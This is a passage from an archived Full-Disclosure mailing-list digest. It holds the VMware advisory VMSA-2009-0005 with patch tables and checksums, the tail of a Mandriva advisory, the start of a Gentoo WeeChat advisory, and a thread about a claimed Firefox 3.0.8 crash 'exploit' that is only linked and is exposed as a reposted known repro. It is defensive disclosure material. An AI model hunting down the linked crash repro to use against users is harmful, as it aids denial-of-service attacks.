 de1b19bdf5307d242e37ddbd387d34ed  corporate/3.0/x86_64/gstreamer-visualisation-0.6.4-4.2mdk.x86_64.rpm
 2182ea1ada21c49b2396a6987d4e9b01  corporate/3.0/x86_64/gstreamer-vorbis-0.6.4-4.2mdk.x86_64.rpm
 cb0fea26b7692ce584058495e7e40c1c  corporate/3.0/x86_64/gstreamer-xvideosink-0.6.4-4.2mdk.x86_64.rpm
 49118bcb6696d6e49cece68d7a068ae1  corporate/3.0/x86_64/gstreamer-yuv4mjpeg-0.6.4-4.2mdk.x86_64.rpm
 08035d8aead9e7da152d423b8bf81dd9  corporate/3.0/x86_64/lib64gstgconf0.6-0.6.4-4.2mdk.x86_64.rpm
 187035879a19f3fd8a6d4033c4073248  corporate/3.0/x86_64/lib64gstplay0.6-0.6.4-4.2mdk.x86_64.rpm 
 e9f225788d97dd5611a8da50bbb4bb97  corporate/3.0/SRPMS/gstreamer-plugins-0.6.4-4.2mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFJ1n7gmqjQ0CJFipgRAvVOAJ9/yjCiSfBPsC+PBzKPpLtKzxwpcACeJ7vM
QY3Z+/aokwfp0piCYdzSZ90=
=dTAp
-----END PGP SIGNATURE-----



From security at vmware.com  Sat Apr  4 06:22:07 2009
From: security at vmware.com (VMware Security Team)
Date: Fri, 03 Apr 2009 22:22:07 -0700
Subject: [Full-disclosure] VMSA-2009-0005 VMware Hosted products,
 VI Client and patches for ESX and ESXi resolve multiple security
 issues
Message-ID: <49D6EE7F.9060507@vmware.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2009-0005
Synopsis:          VMware Hosted products, VI Client and patches for ESX
                   and ESXi resolve multiple security issues
Issue date:        2009-04-03
Updated on:        2009-04-03 (initial release of advisory)
CVE numbers:       CVE-2008-4916 CVE-2008-3761 CVE-2009-1146
                   CVE-2009-1147 CVE-2009-0909 CVE-2009-0910
                   CVE-2009-0908 CVE-2009-0177 CVE-2009-0518
- ------------------------------------------------------------------------

1. Summary

   Updated VMware Hosted products, VI Client and patches for ESX and
   ESXi resolve multiple security issues.  

2. Relevant releases

   VMware Workstation 6.5.1 and earlier,
   VMware Player 2.5.1 and earlier,
   VMware ACE 2.5.1 and earlier,
   VMware Server 2.0,
   VMware Server 1.0.8 and earlier,

   VMware ESXi 3.5 without patches ESXe350-200811401-O-SG,
                                   ESXe350-200903201-O-UG

   VMware ESX 3.5 without patches ESX350-200811401-SG,
                                  ESX350-200903201-UG

   VMware ESX 3.0.3 without patch ESX303-200811401-BG

   VMware ESX 3.0.2 without patch ESX-1006980

   NOTE: General Support for Workstation version 5.x ended on
   2009-03-19. Users should plan to upgrade to the latest
   Workstation version 6.x release.

   Extended support for ESX 3.0.2 Update 1 ends on 2009-08-08.
   Users should plan to upgrade to ESX 3.0.3 and preferably to
   the newest release available.

3. Problem Description

 a. Denial of service guest to host vulnerability in a virtual device

    A vulnerability in a guest virtual device driver, could allow a
    guest operating system to crash the host and consequently any
    virtual machines on that host.

    VMware would like to thank Andrew Honig of the Department of
    Defense for reporting this issue.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-4916 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    Workstation    6.5.x     any      6.5.1 build 126130 or later
    Workstation    6.0.x     any      upgrade to at least 6.5.1
    Workstation    5.5.x     any      5.5.9 build 126128 or later

    Player         2.5.x     any      2.5.1 build 126130 or later
    Player         2.0.x     any      upgrade to at least 2.5.1
    Player         1.0.x     any      1.0.9 build 126128 or later

    ACE            2.5.x     Windows  2.5.1 build 126130 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.1
    ACE            1.x       Windows  1.0.8 build 125922 or later

    Server         2.x       any      2.0.1 build 156745 or later
    Server         1.x       any      1.0.8 build 126538 or later

    Fusion         2.x       Mac OS/X 2.0.1 build 128865 or later
    Fusion         1.x       Mac OS/X upgrade to at least 2.0.1

    ESXi           3.5       ESXi     ESXe350-200811401-O-SG

    ESX            3.5       ESX      ESX350-200811401-SG
    ESX            3.0.3     ESX      ESX303-200811401-BG
    ESX            3.0.2     ESX      ESX-1006980
    ESX            2.5.5     ESX      not affected

 b. Windows-based host denial of service vulnerability in hcmon.sys

    A vulnerability in an ioctl in hcmon.sys could be used to create
    a denial of service on a Windows-based host. This issue can only
    be exploited by a privileged Windows account.

    VMware would like to thank Nikita Tarakanov for reporting this
    issue to us.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2009-1146 to this issue.

    Note: newly released hosted products (see table in this section)
    address another potential denial of service in hcmon.sys as well.
    Also this issue can only be exploited by a privileged Windows
    account.
 
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-3761 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    Workstation    6.5.x     Windows  6.5.2 build 156735 or later
    Workstation    6.5.x     Linux    not affected
    Workstation    6.0.x     Windows  upgrade to at least 6.5.2
    Workstation    6.0.x     Linux    not affected

    Player         2.5.x     Windows  2.5.2 build 156735 or later
    Player         2.5.x     Linux    not affected
    Player         2.0.x     Windows  upgrade to at least 2.5.2
    Player         2.0.x     Linux    not affected

    ACE            2.5.x     Windows  2.5.2 build 156735 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.2

    Server         2.x       Windows  2.0.1 build 156745 or later
    Server         2.x       Linux    not affected
    Server         1.x       Windows  1.0.9 build 156507 or later
    Server         1.x       Linux    not affected

    Fusion         2.x       Mac OS/X not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected

 c. A VMCI privilege escalation on Windows-based hosts or Windows-
    based guests.

    The Virtual Machine Communication Interface (VMCI) is an
    infrastructure that provides fast and efficient communication
    between a virtual machine and the host operating system and
    between two or more virtual machines on the same host.

    A vulnerability in vmci.sys could allow privilege escalation on
    Windows-based machines. This could occur on Windows-based hosts or
    inside Windows-based guest operating systems.
 
    Current versions of ESX do not support the VMCI interface and
    hence they are not affected by this vulnerability.
 
    Note: Installing the new hosted releases will not remediate the
    issue on Windows-based guests. The VMware Tools packages will need
    to be updated on each Windows-based guest followed by a reboot
    of the guest system.

    VMware would like to thank Nikita Tarakanov for reporting this
    issue to us.

    The Common Vulnerabilities and Exposures project (cve.mitre.org) has
    assigned the name CVE-2009-1147 to this issue.

    Refer to VMware KB article 1009826 on the steps that are needed to
    remediate this vulnerability on Windows-based hosts. This KB article
    is found at http://kb.vmware.com/kb/1009826.

    The following table lists what action remediates the vulnerability
    on Windows-based guests (column 4) if a solution is available.
   
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    Workstation    6.5.x     Windows  6.5.2 build 156735 or later
    Workstation    6.5.x     Linux    not affected
    Workstation    6.0.x     Windows  upgrade to at least 6.5.2
    Workstation    6.0.x     Linux    not affected

    Player         2.5.x     Windows  2.5.2 build 156735 or later
    Player         2.5.x     Linux    not affected
    Player         2.0.x     Windows  upgrade to at least 2.5.2
    Player         2.0.x     Linux    not affected

    ACE            2.5.x     Windows  2.5.2 build 156735 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.2

    Server         2.x       Windows  2.0.1 build 156745 or later
    Server         2.x       Linux    not affected
    Server         1.x       any      not affected

    Fusion         2.x       Mac OS/X not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected

 d. VNnc Codec Heap Overflow vulnerabilities

    The VNnc Codec assists in Record and Replay sessions. Record and
    Replay record the dynamic virtual machine state over a period of
    time.

    Two heap overflow vulnerabilities could allow a remote attacker to
    execute arbitrary code on VMware hosted products. For an attack to
    be successful the user must be tricked into visiting a malicious web
    page or opening a malicious video file.

    VMware would like to thank Aaron Portnoy from TippingPoint DVLabs
    for reporting these issues to us. TippingPoint has issued the
    following identifiers: ZDI-CAN-435, ZDI-CAN-436.

    The Common Vulnerabilities and Exposures project (cve.mitre.org) has
    has assigned the names CVE-2009-0909 and CVE-2009-0910 to these
    issues.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    Workstation    6.5.x     any      6.5.2 build 156735 or later
    Workstation    6.0.x     any      not affected

    Player         2.5.x     any      2.5.X build 156735 or later
    Player         2.0.x     any      not affected

    ACE            2.5.x     Windows  2.5.2 build 156735 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.2

    Server         2.x       any      2.0.1 build 156745 or later
    Server         1.x       any      not affected

    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected

 e. ACE shared folders vulnerability

    The VMware Host Guest File System (HGFS) shared folders feature allows
    users to transfer data between a guest operating system and the
    non-virtualized host operating system that contains it.

    A vulnerability in ACE shared folders could allow a previously disabled
    and not removed shared folder in the guest to be enabled by a non ACE
    Administrator.
     
    VMware would like to thank Emmanouel Kellinis, KPMG London, penetration
    testing team for reporting this issue to us.

    The Common Vulnerabilities and Exposures project (cve.mitre.org) has
    has assigned the name CVE-2009-0908 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    Workstation    6.x.x     any      not affected

    Player         2.5.x     any      not affected

    ACE            2.5.x     Windows  2.5.2 build 156735 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.2

    Server         any       any      not affected

    Fusion         any       Mac OS/X not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            2.5.5     ESX      not affected

 f. A remote denial of service vulnerability in authd for Windows
    based hosts.

    A vulnerability in vmware-authd.exe could cause a denial
    of service condition on Windows hosts.

    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-0177 to this issue.
 
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    Workstation    6.5.x     Windows  6.5.2 build 156735 or later
    Workstation    6.5.x     Linux    not affected
    Workstation    6.0.x     Windows  upgrade to at least 6.5.2
    Workstation    6.0.x     Linux    not affected

    Player         2.5.x     Windows  2.5.2 build 156735 or later
    Player         2.5.x     Linux    not affected
    Player         2.0.x     Windows  upgrade to at least 2.5.2
    Player         2.0.x     Linux    not affected

    ACE            2.5.x     Windows  2.5.2 build 156735 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.2

    Server         2.x       Windows  2.0.1 build 156745 or later
    Server         2.x       Linux    not affected
    Server         1.x       any      not affected

    Fusion         2.x       Mac OS/X 2.0.2 build 147997 or later

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected

g. VI Client Retains VirtualCenter Server Password in Memory

    After logging in to VirtualCenter Server with VI Client, the
    password for VirtualCenter Server might be present in the memory
    of the VI Client.

    Note: This vulnerability is present in VI Client and in order to
    remediate the vulnerability, you will need to replace VI Client
    with a fixed version (see below).

    VMware would like to thank Craig Marshall for reporting this
    issue to us.

    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-0518 to this issue.
 
    To determine if your copy of VI Client is not vulnerable, check the
    about box under the help menu of VI Client. Your copy is not
    vulnerable if this box mentions one of the following:
    - ESX 2.5.5,
    - ESX 3.0,
    - VC build number 147704, 147694, or 147633 (or higher).

    A VI Client copy that remediates the problem can be obtained from:
    - VirtualCenter 2.5 Update 4,
    - ESXi 3.5 after applying patch ESXe350-200903201-O-UG
      (this patch is part of the ESXi 3.5 Update 4 release),
    - ESX 3.5 after applying patch ESX350-200903201-UG
      (this patch is part of the ESX 3.5 Update 4 release).


4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum and/or the sha1sum of your downloaded file.

   VMware Workstation 6.5.2
   ------------------------
   http://www.vmware.com/download/ws/
   Release notes:
   http://www.vmware.com/support/ws65/doc/releasenotes_ws652.html

   For Windows

   Workstation for Windows 32-bit and 64-bit
   Windows 32-bit and 64-bit .exe
   md5sum: 8336586b9f9e5180d5279a0b988e82a6
   sha1sum: ccdb6bcb867638e8f4f493bc02c6f70c5ebbb88e

   For Linux

   Workstation for Linux 32-bit
   Linux 32-bit .rpm
   md5sum: 69b039c848f6b2c94948928d8e9057bb
   sha1sum: 37ca77ef550db932cf7b078fcbd6fa0155e3411e

   Workstation for Linux 32-bit
   Linux 32-bit .bundle
   md5sum: 5d4ccf9c23701d09a671f586a9bb4190
   sha1sum: d508111adf479d82049c323b1d0b82200c0ab4dd

   Workstation for Linux 64-bit
   Linux 64-bit .rpm
   md5sum: 19387416e3b597b901dfe84e4a2bcd97
   sha1sum: 0726518abc9a77051d991af570774bae1625ff78

   Workstation for Linux 64-bit
   Linux 64-bit .bundle
   md5sum: 56dfc3adcf96701f440b19a8cf06c3df
   sha1sum: 04aa442a2b9bf2c67d6266a410b20ef146b93bef


   VMware Player 2.5.2
   -------------------
   http://www.vmware.com/download/player/
   Release notes:
   http://www.vmware.com/support/player25/doc/releasenotes_player252.html

   Player for Windows binary
 
http://download3.vmware.com/software/vmplayer/VMware-player-2.5.2-156735.ex
e
   md5sum: 01356d729e9b031c8904e9560a02c469

   Player for Linux (.rpm)
 
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.2-156735.i3
86.rpm
   md5sum: aa047047b72de7f4b53d9c2128b53bec

   Player for Linux (.bundle)
 
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.2-156735.i3
86.bundle
   md5sum: bd51e8f8ef2417080c6d734f6ea9fb87

   VMware Player 2.5.2 - 64-bit (.rpm)
 
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.2-156735.x8
6_64.rpm
   md5sum: 5b488b97b5091d3980eb74ec0a5c065b

   VMware Player 2.5.2 - 64-bit (.bundle)
 
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.2-156735.x8
6_64.bundle
   md5sum: 25254cd60c4063c2c68a8bf50c2c4869


   VMware ACE 2.5.2
   ----------------
   http://www.vmware.com/download/ace/
   Release notes:
   http://www.vmware.com/support/ace25/doc/releasenotes_ace252.html

   ACE Management Server Virtual Appliance
   AMS Virtual Appliance .zip
   md5sum: 430ff7792d9d490d1678fc22b4c62121
   sha1sum: 98b74e0dba4214b055c95ccea656bfa2731c3fee

   VMware ACE for Windows 32-bit and 64-bit
   Windows 32-bit and 64-bit .exe
   md5sum: 8336586b9f9e5180d5279a0b988e82a6

   ACE Management Server for Windows
   Windows .exe
   md5sum: 44918519a7bac2501b211c9825ed8268
   sha1sum: 97655c824815f7c4e25f6940c708f835ab616da9

   ACE Management Server for SUSE Enterprise Linux 9
   SLES 9 .rpm
   md5sum: 7fcb0409474c7e81accc90f25d80b00e
   sha1sum: 385b254930dd6b8c53e3c805653c1fa1b07a6161

   ACE Management Server for Red Hat Enterprise Linux 4
   RHEL 4 .rpm
   md5sum: 745e3115f8557fa04c2ddaf25320a911
   sha1sum: ef75d572325a32a7582dbb4c352541978d3cebeb


   VMware Server 2.0.1
   -------------------
   http://www.vmware.com/download/server/
   Release notes:
   http://www.vmware.com/support/server2/doc/releasenotes_vmserver201.html

   For Windows

   VMware Server 2
   Version 2.0.1 | 156745 - 03/31/09   
   507 MB EXE image VMware Server 2 for Windows Operating Systems. A
   master installer file containing all Windows components of VMware
   Server.
   md5sum: d0eefaa79e42d13a693c4d732a460ba4

   VIX API 1.6 for Windows.
   Version 1.6.2 | 156745 - 03/31/09    37 MB EXE image
   md5sum: ad531ed3c37c0a50fb915981f83ca133

   For Linux

   VMware Server 2 for Linux Operating Systems.
   Version 2.0.1 | 156745 - 03/31/09    465 MB RPM image
   md5sum: eb42331bbd9be30848826b8cab73e0ca

   VMware Server 2 for Linux Operating Systems.
   Version 2.0.1 | 156745 - 03/31/09    466 MB TAR image
   md5sum: be96bc1696f4cef67755bfd2553ce233

   VMware Server 2 for Linux Operating Systems 64-bit version.
   Version 2.0.1 | 156745 - 03/31/09    434 MB RPM image
   md5sum: 697a792c70d50e98a347c06b323bd20b

   The core application needed to run VMware Server 2, 64-bit version.
   Version 2.0.1 | 156745 - 03/31/09    436 MB TAR image
   md5sum: f40498229772910d6a6788b7803f9c38

   VIX API 1.6 for Linux.
   Version 1.6.2 | 156745 - 03/31/09    17 MB TAR image
   md5sum: 2ef6174b90cdd9a2832b57dbe94cfbb1

   64-bit VIX API 1.6 for Linux.
   Version 1.6.2 | 156745 - 03/31/09    21 MB TAR image
   md5sum: 454aeba273f9a89c578223c95b262323


   VMware Server 1.0.9
   -------------------
   http://www.vmware.com/download/server/
   Release notes:
   http://www.vmware.com/support/server/doc/releasenotes_server.html

   VMware Server for Windows 32-bit and 64-bit
 
http://download3.vmware.com/software/vmserver/VMware-server-installer-1.0.9
- -156507.exe
   md5sum: 8c650f8a0a0521b69c6aba00d910cfb9

   VMware Server Windows client package
 
http://download3.vmware.com/software/vmserver/VMware-server-win32-client-1.
0.9-156507.zip
   md5sum: c83e673f7422a4f3edaf7d9337cf5d6d

   VMware Server for Linux
 
http://download3.vmware.com/software/vmserver/VMware-server-1.0.9-156507.ta
r.gz
   md5sum: ff4b57588514c83b1a828e3b19843ad2

   VMware Server for Linux rpm
 
http://download3.vmware.com/software/vmserver/VMware-server-1.0.9-156507.i3
86.rpm
   md5sum: c8fc9e9f948f2807b9f8bfb3ca318f36

   Management Interface
 
http://download3.vmware.com/software/vmserver/VMware-mui-1.0.9-156507.tar.g
z
   md5sum: dbf99faef8bd26e173cf2514d7bea449

   VMware Server Linux client package
 
http://download3.vmware.com/software/vmserver/VMware-server-linux-client-1.
0.9-156507.zip
   md5sum: 7e76a481408454a747bb4d076a6e2524

 
   VirtualCenter
   -------------
   VMware VirtualCenter 2.5 Update 4
   www.vmware.com/download/download.do
   DVD iso image
   md5sum: 4304334ed7662b6a43646e6dde0956d2
   Zip file
   md5sum: 1306cb9b25e28a06bab84257d7cbf38f
   Release Notes
   www.vmware.com/support/vi3/doc/vi3_vc25u4_rel_notes.html

 
   ESXi
   ----
   ESXi 3.5 patch ESXe350-200811401-O-SG (guest virtual device driver)
   http://download3.vmware.com/software/vi/ESXe350-200811401-O-SG.zip
   md5sum: e895c8cb0d32b722d7820d0214416092
   http://kb.vmware.com/kb/1007508

   ESXi 3.5 patch ESXe350-200903201-O-UG (VI Client)
   http://download3.vmware.com/software/vi/ESXe350-200903201-O-UG.zip
   md5sum: 45632da28812837bb00cee86af85b8a5
   http://kb.vmware.com/kb/1007992

   NOTES: ESXi 3.5 patch ESXe350-200903201-O-UG supercedes
          ESXe350-200811401-O-SG

          The three ESXi patches for Firmware "I", VMware Tools "T,"
          and the VI Client "C" are contained in a single offline "O"
          download file.


   ESX
   ---
   ESX 3.5 patch ESX350-200811401-SG (guest virtual device driver)
   http://download3.vmware.com/software/vi/ESX350-200811401-SG.zip
   md5sum: 988042ce20ce2381216fbe1862c3e66d
   http://kb.vmware.com/kb/1007501
 
   ESX 3.5 patch ESX350-200903201-UG (VI Client)
   http://download3.vmware.com/software/vi/ESX350-200903201-UG.zip
   md5sum: 650fa096cf270ec58d38e9ff41c661aa
   http://kb.vmware.com/kb/1007971

   ESX 3.0.3 patch ESX303-200811401-BG (guest virtual device driver)
   http://download3.vmware.com/software/vi/ESX303-200811401-BG.zip
   md5sum: 26bf687a3483951d1f14ab66edf1d196
   http://kb.vmware.com/kb/1006986

   ESX 3.0.2 patch ESX-1006980 (guest virtual device driver)
   http://download3.vmware.com/software/vi/ESX-1006980.tgz
   md5sum: 5e73f1585fea3ee770b2df2b94e73ca4
   http://kb.vmware.com/kb/1006980


5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4916
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3761
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1146
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1147
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0909
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0910
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0908
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0177
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0518
 
- ------------------------------------------------------------------------
6. Change log

2009-04-03  VMSA-2009-0005
Initial security advisory after hosted product releases on 2009-04-01.
Relevant patches for ESXi, ESX 3.5, ESX 3.0.3, ESX 3.0.2 were released
previously.

- -----------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2009 VMware Inc.  All rights reserved.



-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFJ1u5qS2KysvBH1xkRApYYAJ91Ssq7bQjOb59zyv/yvQPg4GO+JACfQAmK
4In+Tz6tSFK0sntfCBNShdk=
=ETmH
-----END PGP SIGNATURE-----



From hardwick.carl at gmail.com  Sat Apr  4 13:39:40 2009
From: hardwick.carl at gmail.com (carl hardwick)
Date: Sat, 4 Apr 2009 14:39:40 +0200
Subject: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit
Message-ID: <bc7e11f20904040539u30ce8279t9752bad68840c933@mail.gmail.com>

I found an unpatched vulnerability in the latest Firefox 3.0.8 allows
a remote attacker to cause a DoS.
A 0-day exploit is available here:
http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjwsAAAA1umYfXMbeoe6wr8IrMRRv



From berendjanwever at gmail.com  Sat Apr  4 16:53:18 2009
From: berendjanwever at gmail.com (Berend-Jan Wever)
Date: Sat, 4 Apr 2009 17:53:18 +0200
Subject: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit
In-Reply-To: <bc7e11f20904040539u30ce8279t9752bad68840c933@mail.gmail.com>
References: <bc7e11f20904040539u30ce8279t9752bad68840c933@mail.gmail.com>
Message-ID: <3fa2f5bb0904040853s6ce2df5dlce1739ba6865b4b2@mail.gmail.com>

...sigh....

This is https://bugzilla.mozilla.org/show_bug.cgi?id=456727, which I
reported to Mozilla in September of 2009. It is a NULL ptr DoS, there is no
"exploit" in the sense of executing arbitrary code, just a "repro" that can
trigger a crash. The repro provided by Carl is the exact same repro I
provided to Mozilla.

Incidentally, Carl has report this exact same bug before:
http://seclists.org/fulldisclosure/2009/Jan/0219.html. This is how the repro
got on milw0rm in the first place (http://milw0rm.com/exploits/8091). Aditya
K Sood later submitted the repro (slightly modified) to milw0rm as his code
as well (http://milw0rm.com/exploits/8219).

Some say plagiarism is the sincerest form of flattery, so I guess I'll start
obfuscating my repros into ASCII art that says "SkyLined" to prevent any
more people from flattering me.

Cheers,
Sky


Berend-Jan Wever <berendjanwever at gmail.com>
http://skypher.com/SkyLined




On Sat, Apr 4, 2009 at 2:39 PM, carl hardwick <hardwick.carl at gmail.com>wrote:

> I found an unpatched vulnerability in the latest Firefox 3.0.8 allows
> a remote attacker to cause a DoS.
> A 0-day exploit is available here:
>
> http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjwsAAAA1umYfXMbeoe6wr8IrMRRv
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090404/f4adb615/attachment.html 

From mbann at cems.umn.edu  Sat Apr  4 18:26:14 2009
From: mbann at cems.umn.edu (Mike Bann)
Date: Sat, 04 Apr 2009 12:26:14 -0500
Subject: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit
In-Reply-To: <3fa2f5bb0904040853s6ce2df5dlce1739ba6865b4b2@mail.gmail.com>
References: <bc7e11f20904040539u30ce8279t9752bad68840c933@mail.gmail.com>
	<3fa2f5bb0904040853s6ce2df5dlce1739ba6865b4b2@mail.gmail.com>
Message-ID: <49D79836.602@cems.umn.edu>

I highly doubt you reported this to Mozilla in "September of 2009". I 
don't think time machines like that exist yet, but i'd be pleased to be 
wrong.

Berend-Jan Wever wrote:
> ...sigh....
>
> This is https://bugzilla.mozilla.org/show_bug.cgi?id=456727, which I 
> reported to Mozilla in September of 2009. It is a NULL ptr DoS, there 
> is no "exploit" in the sense of executing arbitrary code, just a 
> "repro" that can trigger a crash. The repro provided by Carl is the 
> exact same repro I provided to Mozilla.
>
> Incidentally, Carl has report this exact same bug 
> before: http://seclists.org/fulldisclosure/2009/Jan/0219.html. This is 
> how the repro got on milw0rm in the first place 
> (http://milw0rm.com/exploits/8091). Aditya K Sood later submitted the 
> repro (slightly modified) to milw0rm as his code as well 
> (http://milw0rm.com/exploits/8219).
>
> Some say plagiarism is the sincerest form of flattery, so I guess I'll 
> start obfuscating my repros into ASCII art that says "SkyLined" to 
> prevent any more people from flattering me.
>
> Cheers,
> Sky
>
>
> Berend-Jan Wever <berendjanwever at gmail.com 
> <mailto:berendjanwever at gmail.com>>
> http://skypher.com/SkyLined
>
>
>
>
> On Sat, Apr 4, 2009 at 2:39 PM, carl hardwick <hardwick.carl at gmail.com 
> <mailto:hardwick.carl at gmail.com>> wrote:
>
>     I found an unpatched vulnerability in the latest Firefox 3.0.8 allows
>     a remote attacker to cause a DoS.
>     A 0-day exploit is available here:
>     http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjwsAAAA1umYfXMbeoe6wr8IrMRRv
>     <http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oPfkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8xnmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjwsAAAA1umYfXMbeoe6wr8IrMRRv>
>
>     _______________________________________________
>     Full-Disclosure - We believe in it.
>     Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>     Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



From keytoaster at gentoo.org  Sat Apr  4 18:22:54 2009
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Sat, 04 Apr 2009 19:22:54 +0200
Subject: [Full-disclosure] [ GLSA 200904-04 ] WeeChat: Denial of Service
Message-ID: <49D7976E.9070307@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
